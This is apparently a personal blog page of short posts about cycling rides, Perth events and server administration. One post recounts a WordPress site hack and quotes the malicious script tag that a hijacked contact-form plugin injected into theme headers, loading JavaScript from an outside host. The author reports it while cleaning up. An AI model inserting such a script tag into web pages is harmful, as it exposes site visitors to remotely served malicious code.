So close…
http://veltman.org/wp-content/uploads/2018/05/img_0406.movOdd way to start
One cycling trip, off to a cracking start
New stadium
Overall it’s better.
For 1.6 billion it had to be
Leuwin concert
Getting a ride in before the big event
A great weekend
Yagan square opens
All that and the bike ride too
Ride and fly
Another great day
http://veltman.org/wp-content/uploads/2018/02/large.movSkyshow 2018
Another Sunday ride
Nice and easy way to do this Sunday
Getting Hacked
Looks like a couple of my websites fell foul of the hacking of the fast secure contact form. Really annoying that I had to undo this.
References on both painscience.com.au and also veltman.org to the script that had inserted this into the headers of all my themes:
<script src='https://json.stringengines.com/pson.js?n=1' type='text/javascript'></script>
I think that what appears to have happened here is that the fast secure contact form was bought by a malicious programmer who then put an update that inserted this malware. Its since been pulled by the wordpress site from the list of plugins.
The original author did do one final update on his website that I’ve downloaded, so I’ll probably need to install that on my servers as it was a useful plugin.
Live and learn.
Increasing the maximum file size for uploads
Just for the record, this needs to go into the .htaccess file in the /etc/apache2 folder.
php_value upload_max_filesize 64M php_value post_max_size 64M php_value max_execution_time 300 php_value max_input_time 300